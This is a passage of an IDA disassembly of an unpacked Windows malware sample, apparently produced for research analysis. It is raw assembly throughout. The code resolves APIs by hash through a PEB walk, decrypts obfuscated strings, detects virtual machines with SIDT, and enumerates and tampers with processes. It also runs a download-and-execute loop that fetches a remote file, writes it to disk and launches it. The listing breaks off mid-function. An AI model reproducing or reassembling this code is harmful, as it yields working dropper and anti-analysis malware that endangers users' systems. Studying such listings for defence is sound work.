;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 998753B516568DA87A174224033C9E1B
; File Name : u:\work\998753b516568da87a174224033c9e1b_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40102C+28�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
lea ecx, [edx-1]
test ecx, ecx
push 2
pop eax
jz short loc_401014
loc_40100E: ; CODE XREF: sub_401000+12�j
imul eax, eax
dec ecx
jnz short loc_40100E
loc_401014: ; CODE XREF: sub_401000+C�j
push esi
movzx esi, [esp+4+arg_0]
push 8
dec eax
and eax, esi
pop ecx
sub ecx, edx
shl eax, cl
mov cl, dl
shr esi, cl
or eax, esi
pop esi
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40102C proc near ; CODE XREF: sub_401117:loc_401163�p
; sub_401497+1E8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_4]
push 100h
xor esi, esi
push esi
push edi
call sub_4010BB
add esp, 0Ch
cmp [esp+8+arg_8], esi
jle short loc_40106B
push ebx
mov ebx, [esp+0Ch+arg_0]
loc_40104E: ; CODE XREF: sub_40102C+3C�j
movzx eax, byte ptr [ebx]
push 7
push eax
call sub_401000
not al
xor al, 54h
inc ebx
mov [esi+edi], al
inc esi
cmp esi, [esp+14h+arg_8]
pop ecx
pop ecx
jl short loc_40104E
pop ebx
loc_40106B: ; CODE XREF: sub_40102C+1B�j
mov byte ptr [esi+edi], 0
pop edi
pop esi
retn
sub_40102C endp
; =============== S U B R O U T I N E =======================================
sub_401072 proc near ; CODE XREF: sub_401117:loc_4011C7�p
push esi
mov eax, fs:[eax+30h]
test eax, eax
js short loc_401087
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov eax, [eax+8]
jmp short loc_401090
; ---------------------------------------------------------------------------
loc_401087: ; CODE XREF: sub_401072+7�j
mov eax, [eax+34h]
lea eax, [eax+7Ch]
mov eax, [eax+3Ch]
loc_401090: ; CODE XREF: sub_401072+13�j
pop esi
retn
sub_401072 endp
; ---------------------------------------------------------------------------
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401094 proc near ; CODE XREF: sub_401BD8+1F3�p
var_7 = byte ptr -7
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_1], 0
sidt fword ptr [ebp+var_7]
mov eax, dword ptr [ebp+var_7+2]
and eax, 0FFF00000h
cmp eax, 0FFC00000h
jnz short loc_4010B5
mov [ebp+var_1], 1
loc_4010B5: ; CODE XREF: sub_401094+1B�j
movzx eax, [ebp+var_1]
leave
retn
sub_401094 endp
; =============== S U B R O U T I N E =======================================
sub_4010BB proc near ; CODE XREF: sub_40102C+F�p
; sub_401497+D4�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
test ecx, ecx
jz short loc_4010E9
mov al, [esp+arg_4]
push ebx
mov bl, al
mov bh, bl
mov edx, ecx
push edi
mov edi, [esp+8+arg_0]
shr ecx, 2
mov eax, ebx
shl eax, 10h
mov ax, bx
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
pop edi
pop ebx
loc_4010E9: ; CODE XREF: sub_4010BB+6�j
mov eax, [esp+arg_0]
retn
sub_4010BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010EE proc near ; CODE XREF: sub_402455+191�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
mov eax, [ebp+arg_4]
jz short loc_40110E
mov ecx, [ebp+arg_0]
sub ecx, eax
loc_4010FF: ; CODE XREF: sub_4010EE+1E�j
mov dl, [eax]
dec [ebp+arg_8]
mov [ecx+eax], dl
inc eax
cmp [ebp+arg_8], 0
jnz short loc_4010FF
loc_40110E: ; CODE XREF: sub_4010EE+A�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_4010EE endp
; =============== S U B R O U T I N E =======================================
sub_401113 proc near ; CODE XREF: sub_402455+C�p
mov eax, [esp+0]
retn
sub_401113 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401117 proc near ; CODE XREF: sub_401117+58�p
; sub_401302+56�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, dword_404104
add eax, 0FFFFFFCEh
sub esp, 0Ch
cmp eax, 0B4h
ja short loc_401132
inc dword_404104
loc_401132: ; CODE XREF: sub_401117+13�j
mov eax, [ebp+arg_0]
dec eax
push esi
jz loc_4011C7
dec eax
jz short loc_4011B8
dec eax
jz short loc_4011A9
dec eax
jz short loc_40119A
dec eax
jz short loc_40118B
dec eax
jz short loc_40117C
dec eax
jz short loc_401156
loc_40114F: ; CODE XREF: sub_401117+1BD�j
xor eax, eax
jmp loc_4012FA
; ---------------------------------------------------------------------------
loc_401156: ; CODE XREF: sub_401117+36�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_40305C
loc_401163: ; CODE XREF: sub_401117+72�j
; sub_401117+81�j ...
call sub_40102C
push 0C8AC8026h
push 1
call sub_401117
add esp, 14h
push esi
call eax
jmp short loc_4011CC
; ---------------------------------------------------------------------------
loc_40117C: ; CODE XREF: sub_401117+33�j
push 0Ch
mov esi, offset dword_404108
push esi
push offset dword_40304C
jmp short loc_401163
; ---------------------------------------------------------------------------
loc_40118B: ; CODE XREF: sub_401117+30�j
push 9
mov esi, offset dword_404108
push esi
push offset dword_403040
jmp short loc_401163
; ---------------------------------------------------------------------------
loc_40119A: ; CODE XREF: sub_401117+2D�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_403034
jmp short loc_401163
; ---------------------------------------------------------------------------
loc_4011A9: ; CODE XREF: sub_401117+2A�j
push 0Ah
mov esi, offset dword_404108
push esi
push offset dword_403028
jmp short loc_401163
; ---------------------------------------------------------------------------
loc_4011B8: ; CODE XREF: sub_401117+27�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_40301C
jmp short loc_401163
; ---------------------------------------------------------------------------
loc_4011C7: ; CODE XREF: sub_401117+20�j
call sub_401072
loc_4011CC: ; CODE XREF: sub_401117+63�j
mov ecx, dword_404104
mov [ebp+arg_0], eax
lea eax, [ecx-19h]
cmp eax, 0B0h
ja short loc_4011E6
inc ecx
mov dword_404104, ecx
loc_4011E6: ; CODE XREF: sub_401117+C6�j
mov eax, [ebp+arg_0]
mov edx, [eax+3Ch]
mov esi, [edx+eax+78h]
add esi, eax
cmp ecx, 34h
jge short loc_4011FE
inc ecx
mov dword_404104, ecx
loc_4011FE: ; CODE XREF: sub_401117+DE�j
mov eax, [ebp+arg_4]
shr eax, 10h
test ax, ax
jnz short loc_401215
movzx eax, word ptr [ebp+arg_4]
sub eax, [esi+10h]
jmp loc_4012DA
; ---------------------------------------------------------------------------
loc_401215: ; CODE XREF: sub_401117+F0�j
cmp ecx, 12h
jl short loc_401221
inc ecx
mov dword_404104, ecx
loc_401221: ; CODE XREF: sub_401117+101�j
cmp ecx, 98h
jle short loc_401232
push 15h
pop ecx
mov dword_404104, ecx
loc_401232: ; CODE XREF: sub_401117+110�j
mov eax, [esi+24h]
add eax, [ebp+arg_0]
push ebx
push edi
mov edi, [esi+20h]
add edi, [ebp+arg_0]
cmp ecx, 0Dh
mov [ebp+var_C], eax
jl short loc_40124F
inc ecx
mov dword_404104, ecx
loc_40124F: ; CODE XREF: sub_401117+12F�j
cmp ecx, 97h
jle short loc_401260
push 19h
pop ecx
mov dword_404104, ecx
loc_401260: ; CODE XREF: sub_401117+13E�j
and [ebp+var_4], 0
cmp dword ptr [esi+18h], 0
jbe short loc_4012AC
loc_40126A: ; CODE XREF: sub_401117+193�j
mov edx, [edi]
add edx, [ebp+arg_0]
and [ebp+var_8], 0
mov bl, [edx]
test bl, bl
jz short loc_401291
loc_401279: ; CODE XREF: sub_401117+175�j
mov eax, [ebp+var_8]
movsx ebx, bl
rol eax, 7
xor eax, ebx
inc edx
mov bl, [edx]
test bl, bl
mov [ebp+var_8], eax
jnz short loc_401279
mov eax, [ebp+var_C]
loc_401291: ; CODE XREF: sub_401117+160�j
mov edx, [ebp+var_8]
cmp edx, [ebp+arg_4]
jz short loc_4012FD
inc [ebp+var_4]
mov edx, [ebp+var_4]
add edi, 4
inc eax
inc eax
cmp edx, [esi+18h]
mov [ebp+var_C], eax
jb short loc_40126A
loc_4012AC: ; CODE XREF: sub_401117+151�j
mov eax, [ebp+arg_0]
loc_4012AF: ; CODE XREF: sub_401117+1E9�j
cmp ecx, 0Dh
pop edi
pop ebx
jl short loc_4012BD
inc ecx
mov dword_404104, ecx
loc_4012BD: ; CODE XREF: sub_401117+19D�j
cmp ecx, 0BAh
jle short loc_4012CE
push 18h
pop ecx
mov dword_404104, ecx
loc_4012CE: ; CODE XREF: sub_401117+1AC�j
mov edx, [ebp+var_4]
cmp edx, [esi+18h]
jz loc_40114F
loc_4012DA: ; CODE XREF: sub_401117+F9�j
mov edx, [esi+1Ch]
lea eax, [edx+eax*4]
mov edx, [ebp+arg_0]
mov eax, [eax+edx]
lea esi, [ecx-16h]
cmp esi, 0DBh
ja short loc_4012F8
inc ecx
mov dword_404104, ecx
loc_4012F8: ; CODE XREF: sub_401117+1D8�j
add eax, edx
loc_4012FA: ; CODE XREF: sub_401117+3A�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4012FD: ; CODE XREF: sub_401117+180�j
movzx eax, word ptr [eax]
jmp short loc_4012AF
sub_401117 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401302 proc near ; CODE XREF: sub_401BD8+200�p
; sub_402950+12�p
var_94 = dword ptr -94h
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
cmp dword_404104, 5
jl short loc_40131A
inc dword_404104
loc_40131A: ; CODE XREF: sub_401302+10�j
cmp dword_404104, 0E2h
jle short loc_401330
mov dword_404104, 20h
loc_401330: ; CODE XREF: sub_401302+22�j
cmp byte_404209, 0
jz short loc_401340
mov al, byte_404208
leave
retn
; ---------------------------------------------------------------------------
loc_401340: ; CODE XREF: sub_401302+35�j
push 9C480E24h
push 1
mov byte_404209, 1
mov [ebp+var_94], 94h
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_94]
push ecx
call eax
cmp [ebp+var_84], 2
push 5Bh
pop ecx
setz al
push 53h
mov byte_404208, al
pop edx
loc_40137D: ; CODE XREF: sub_401302+91�j
cmp edx, 0DCh
ja short loc_401387
inc ecx
inc edx
loc_401387: ; CODE XREF: sub_401302+81�j
add ecx, 30h
add edx, 30h
cmp ecx, 88h
jl short loc_40137D
mov dword_404104, ecx
leave
retn
sub_401302 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40139D proc near ; CODE XREF: sub_401497+246�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_404104, 87h
jge short loc_4013B3
inc dword_404104
loc_4013B3: ; CODE XREF: sub_40139D+E�j
push ebx
push esi
push edi
xor edi, edi
inc edi
cmp [ebp+arg_0], 0
jz loc_401470
mov esi, 99A4299Dh
push esi
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+arg_0]
push edi
push edi
call eax
mov ebx, eax
test ebx, ebx
jz short loc_40142A
push 15h
pop eax
push 0FFFFFFF1h
pop ecx
loc_4013E4: ; CODE XREF: sub_40139D+5C�j
cmp ecx, 0C5h
ja short loc_4013EE
inc eax
inc ecx
loc_4013EE: ; CODE XREF: sub_40139D+4D�j
add eax, 2Eh
add ecx, 2Eh
cmp eax, 93h
jl short loc_4013E4
push 0FDC94385h
push edi
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push ebx
call eax
mov esi, [ebp+var_4]
push 9E6FA842h
push edi
call sub_401117
pop ecx
pop ecx
push esi
push ebx
call eax
jmp short loc_401473
; ---------------------------------------------------------------------------
loc_40142A: ; CODE XREF: sub_40139D+3F�j
cmp dword_404104, 63h
jge short loc_401439
inc dword_404104
loc_401439: ; CODE XREF: sub_40139D+94�j
push esi
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+arg_0]
push 0
push edi
call eax
push 9E6FA842h
push edi
mov ebx, eax
call sub_401117
pop ecx
pop ecx
push 0FFFFFFFFh
push ebx
call eax
push 723EB0D5h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
call eax
jmp short loc_401473
; ---------------------------------------------------------------------------
loc_401470: ; CODE XREF: sub_40139D+20�j
mov ebx, [ebp+arg_0]
loc_401473: ; CODE XREF: sub_40139D+8B�j
; sub_40139D+D1�j
cmp dword_404104, 62h
jge short loc_401482
inc dword_404104
loc_401482: ; CODE XREF: sub_40139D+DD�j
push 723EB0D5h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_40139D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401497 proc near ; CODE XREF: sub_401BD8+20A�p
; sub_402950+ED�p ...
var_1318 = dword ptr -1318h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_116 = byte ptr -116h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1318h
call sub_402CF0
cmp dword_404104, 4Ch
jge short loc_4014B3
inc dword_404104
loc_4014B3: ; CODE XREF: sub_401497+14�j
push ebx
push esi
push edi
push 774393E8h
push 1
call sub_401117
pop ecx
pop ecx
mov ebx, 100h
push ebx
lea ecx, [ebp+var_318]
push ecx
push 0
call eax
push 8AC4909Bh
push 5
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_C]
push ecx
push 1000h
lea ecx, [ebp+var_1318]
push ecx
call eax
test eax, eax
jz loc_401758
cmp dword_404104, 0DEh
jge short loc_40150F
inc dword_404104
loc_40150F: ; CODE XREF: sub_401497+70�j
and [ebp+var_4], 0
test [ebp+var_C], 0FFFFFFFCh
jbe loc_401758
mov edi, offset dword_404108
loc_401525: ; CODE XREF: sub_401497+2BB�j
mov eax, [ebp+var_4]
mov esi, [ebp+eax*4+var_1318]
test esi, esi
jz loc_401746
cmp dword_404104, 2Ah
jge short loc_401546
inc dword_404104
loc_401546: ; CODE XREF: sub_401497+A7�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
xor esi, esi
push esi
push 410h
call eax
push ebx
mov [ebp+var_8], eax
lea eax, [ebp+var_118]
push esi
push eax
call sub_4010BB
add esp, 0Ch
cmp [ebp+var_8], esi
jz loc_401733
push 189F16C9h
push 5
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_14]
push ecx
push 4
lea ecx, [ebp+var_10]
push ecx
push [ebp+var_8]
call eax
test eax, eax
jz loc_401733
cmp dword_404104, 0BCh
jge short loc_4015B3
inc dword_404104
loc_4015B3: ; CODE XREF: sub_401497+114�j
mov esi, [ebp+var_10]
push 0E4FB2191h
push 5
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_118]
push ecx
push esi
push [ebp+var_8]
call eax
mov esi, dword_403008
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
test eax, eax
jz loc_401733
cmp [ebp+var_117], 3Ah
jnz loc_401733
cmp [ebp+var_116], 5Ch
jnz loc_401733
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
mov esi, eax
jmp short loc_401611
; ---------------------------------------------------------------------------
loc_401610: ; CODE XREF: sub_401497+182�j
dec esi
loc_401611: ; CODE XREF: sub_401497+177�j
cmp [ebp+esi+var_118], 5Ch
jnz short loc_401610
push [ebp+arg_0]
call dword_403008 ; lstrlen
test eax, eax
jle short loc_401662
cmp dword_404104, 0C7h
jge short loc_40163A
inc dword_404104
loc_40163A: ; CODE XREF: sub_401497+19B�j
push [ebp+arg_0]
lea eax, [ebp+esi+var_117]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jnz loc_401733
mov eax, [ebp+var_4]
mov eax, [ebp+eax*4+var_1318]
jmp loc_40177D
; ---------------------------------------------------------------------------
loc_401662: ; CODE XREF: sub_401497+18F�j
mov eax, dword_404104
add eax, 0FFFFFFF1h
cmp eax, 0C3h
ja short loc_401677
inc dword_404104
loc_401677: ; CODE XREF: sub_401497+1D8�j
push 0Bh
push edi
push offset dword_40306C
call sub_40102C
push 8A94F707h
push 7
call sub_401117
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
test eax, eax
jnz loc_401733
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_118]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jz short loc_401733
push edi
lea eax, [ebp+esi+var_117]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jz short loc_401733
mov eax, [ebp+var_4]
push [ebp+eax*4+var_1318]
call sub_40139D
pop ecx
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_218]
push eax
call dword_403000 ; lstrcpy
push 1
push edi
push offset dword_403068
call sub_40102C
add esp, 0Ch
push edi
lea eax, [ebp+var_218]
push eax
call dword_40300C ; lstrcat
push 20E4E9EDh
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_218]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
loc_401733: ; CODE XREF: sub_401497+DF�j
; sub_401497+104�j ...
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
loc_401746: ; CODE XREF: sub_401497+9A�j
mov eax, [ebp+var_C]
inc [ebp+var_4]
shr eax, 2
cmp [ebp+var_4], eax
jb loc_401525
loc_401758: ; CODE XREF: sub_401497+60�j
; sub_401497+83�j
cmp dword_404104, 0Dh
jl short loc_401767
inc dword_404104
loc_401767: ; CODE XREF: sub_401497+2C8�j
cmp dword_404104, 0BFh
jle short loc_40177D
mov dword_404104, 16h
loc_40177D: ; CODE XREF: sub_401497+1C6�j
; sub_401497+2DA�j
pop edi
pop esi
pop ebx
leave
retn
sub_401497 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401782 proc near ; CODE XREF: sub_401BD8+2A4�p
; sub_401BD8+318�p ...
var_87C = byte ptr -87Ch
var_47C = byte ptr -47Ch
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 87Ch
push ebx
xor ebx, ebx
cmp dword_404104, 0Dh
mov [ebp+var_4], ebx
mov [ebp+var_14], ebx
mov [ebp+var_20], 7D0h
jl short loc_4017AA
inc dword_404104
loc_4017AA: ; CODE XREF: sub_401782+20�j
cmp dword_404104, 0DAh
jle short loc_4017C0
mov dword_404104, 26h
loc_4017C0: ; CODE XREF: sub_401782+32�j
push esi
push edi
mov esi, 400h
push esi
lea eax, [ebp+var_87C]
push ebx
push eax
call sub_4010BB
push 534D481h
push 3
mov [ebp+var_18], esi
call sub_401117
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_87C]
push ecx
push ebx
call eax
push 5
mov edi, offset dword_404108
push edi
push offset dword_403078
call sub_40102C
add esp, 0Ch
push edi
lea eax, [ebp+var_87C]
push eax
call dword_40300C ; lstrcat
cmp dword_404104, 76h
mov [ebp+var_1C], ebx
jge short loc_40182A
inc dword_404104
loc_40182A: ; CODE XREF: sub_401782+A0�j
push 4
pop edi
loc_40182D: ; CODE XREF: sub_401782+3CA�j
push 8593DD7h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_87C]
push ecx
call eax
push 0B87DBD66h
push edi
mov [ebp+var_C], eax
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_0]
push [ebp+var_C]
call eax
mov [ebp+var_8], eax
mov eax, dword_404104
add eax, 0FFFFFFC0h
cmp eax, 8Fh
ja short loc_40187B
inc dword_404104
loc_40187B: ; CODE XREF: sub_401782+F1�j
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 2
push [ebp+var_C]
call eax
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 6
push [ebp+var_C]
call eax
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 5
push [ebp+var_C]
call eax
cmp dword_404104, edi
jl short loc_4018D4
inc dword_404104
loc_4018D4: ; CODE XREF: sub_401782+14A�j
cmp dword_404104, 0C8h
jle short loc_4018EA
mov dword_404104, 17h
loc_4018EA: ; CODE XREF: sub_401782+15C�j
push 2F5CE027h
push edi
mov [ebp+var_14], ebx
mov [ebp+var_4], edi
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_14]
push ecx
push 20000005h
push [ebp+var_8]
call eax
mov eax, [ebp+var_14]
lea ecx, [eax-401h]
cmp ecx, 48FDEh
ja loc_401A4A
cmp dword_404104, 47h
jge short loc_401934
inc dword_404104
loc_401934: ; CODE XREF: sub_401782+1AA�j
push 8F8F114h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push 80h
push edi
push ebx
push 2
push 40000000h
push [ebp+arg_4]
call eax
push esi
mov [ebp+var_10], eax
lea eax, [ebp+var_47C]
push ebx
push eax
mov [ebp+var_4], ebx
call sub_4010BB
push 1A212962h
push edi
mov [ebp+var_18], esi
call sub_401117
add esp, 14h
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
mov ecx, dword_404104
test eax, eax
setnz al
add ecx, 0FFFFFFC0h
cmp ecx, 0B0h
ja short loc_401A0E
inc dword_404104
jmp short loc_401A0E
; ---------------------------------------------------------------------------
loc_4019AA: ; CODE XREF: sub_401782+28F�j
cmp al, bl
jz short loc_401A13
mov eax, [ebp+var_4]
push 0F3FD1C3h
push 1
mov [ebp+var_24], eax
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_28]
push ecx
push [ebp+var_24]
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_10]
call eax
push esi
lea eax, [ebp+var_47C]
push ebx
push eax
call sub_4010BB
push 1A212962h
push edi
mov [ebp+var_18], esi
mov [ebp+var_4], ebx
call sub_401117
add esp, 14h
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
test eax, eax
setnz al
loc_401A0E: ; CODE XREF: sub_401782+21E�j
; sub_401782+226�j
cmp [ebp+var_4], ebx
ja short loc_4019AA
loc_401A13: ; CODE XREF: sub_401782+22A�j
push 36h
pop eax
push 0FFFFFFDDh
pop ecx
loc_401A19: ; CODE XREF: sub_401782+2AC�j
cmp ecx, 8Fh
ja short loc_401A23
inc eax
inc ecx
loc_401A23: ; CODE XREF: sub_401782+29D�j
add eax, 31h
add ecx, 31h
cmp eax, 98h
jl short loc_401A19
push 723EB0D5h
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push [ebp+var_10]
call eax
jmp short loc_401A5D
; ---------------------------------------------------------------------------
loc_401A4A: ; CODE XREF: sub_401782+19D�j
add eax, 0FFFFFFFEh
cmp eax, 3FEh
ja short loc_401A5D
mov [ebp+arg_8], bl
jmp short loc_401A5D
; ---------------------------------------------------------------------------
loc_401A59: ; CODE XREF: sub_401782+301�j
cmp al, bl
jz short loc_401A85
loc_401A5D: ; CODE XREF: sub_401782+2C6�j
; sub_401782+2D0�j ...
push 1A212962h
push edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
test eax, eax
setnz al
cmp [ebp+var_4], ebx
ja short loc_401A59
loc_401A85: ; CODE XREF: sub_401782+2D9�j
mov eax, dword_404104
add eax, 0FFFFFFB6h
cmp eax, 0A5h
ja short loc_401A9A
inc dword_404104
loc_401A9A: ; CODE XREF: sub_401782+310�j
push 7314FB0Ch
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
push 7314FB0Ch
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+var_C]
call eax
mov eax, dword_404104
add eax, 0FFFFFFAEh
cmp eax, 8Eh
ja short loc_401AD3
inc dword_404104
loc_401AD3: ; CODE XREF: sub_401782+349�j
push 8F8F114h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push 80h
push 3
push ebx
push 1
push 80000000h
push [ebp+arg_4]
call eax
push 0AEF7CBF1h
push 1
mov [ebp+var_10], eax
call sub_401117
pop ecx
pop ecx
push ebx
push [ebp+var_10]
call eax
push 723EB0D5h
push 1
mov [ebp+var_24], eax
call sub_401117
pop ecx
pop ecx
push [ebp+var_10]
call eax
mov eax, dword_404104
inc [ebp+var_1C]
add eax, 0FFFFFFC9h
cmp eax, 9Ah
ja short loc_401B3B
inc dword_404104
loc_401B3B: ; CODE XREF: sub_401782+3B1�j
mov edx, [ebp+var_14]
cmp edx, [ebp+var_24]
jz short loc_401B52
cmp [ebp+var_1C], 5
jge short loc_401B52
cmp [ebp+arg_8], bl
jnz loc_40182D
loc_401B52: ; CODE XREF: sub_401782+3BF�j
; sub_401782+3C5�j
push 2Eh
pop eax
push 0FFFFFFFBh
pop ecx
pop edi
pop esi
loc_401B5A: ; CODE XREF: sub_401782+3ED�j
cmp ecx, 0AAh
ja short loc_401B64
inc eax
inc ecx
loc_401B64: ; CODE XREF: sub_401782+3DE�j
add eax, 2Eh
add ecx, 2Eh
cmp eax, 91h
jl short loc_401B5A
mov dword_404104, eax
lea eax, [edx-2]
cmp eax, 3FEh
ja short loc_401B84
xor eax, eax
jmp short loc_401BD5
; ---------------------------------------------------------------------------
loc_401B84: ; CODE XREF: sub_401782+3FC�j
cmp [ebp+arg_8], bl
jz short loc_401BD2
add edx, 0FFFFFBFFh
cmp edx, 48FDEh
ja short loc_401BD2
push 40h
lea eax, [ebp+var_78]
push ebx
push eax
mov [ebp+var_7C], 44h
call sub_4010BB
push 46318AC7h
push 1
call sub_401117
add esp, 14h
lea ecx, [ebp+var_38]
push ecx
lea ecx, [ebp+var_7C]
push ecx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_4]
push ebx
call eax
xor eax, eax
inc eax
jmp short loc_401BD5
; ---------------------------------------------------------------------------
loc_401BD2: ; CODE XREF: sub_401782+405�j
; sub_401782+413�j
or eax, 0FFFFFFFFh
loc_401BD5: ; CODE XREF: sub_401782+400�j
; sub_401782+44E�j
pop ebx
leave
retn
sub_401782 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401BD8 proc near ; CODE XREF: sub_402950:loc_402CAB�p
; DATA XREF: sub_4027DB+120�o
var_3B8 = byte ptr -3B8h
var_2B8 = byte ptr -2B8h
var_1B8 = byte ptr -1B8h
var_1A8 = byte ptr -1A8h
var_198 = byte ptr -198h
var_188 = byte ptr -188h
var_178 = byte ptr -178h
var_168 = byte ptr -168h
var_158 = byte ptr -158h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_38 = byte ptr -38h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_4 = word ptr -4
push ebp
mov ebp, esp
sub esp, 3B8h
push ebx
push esi
push edi
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_403034
call sub_40102C
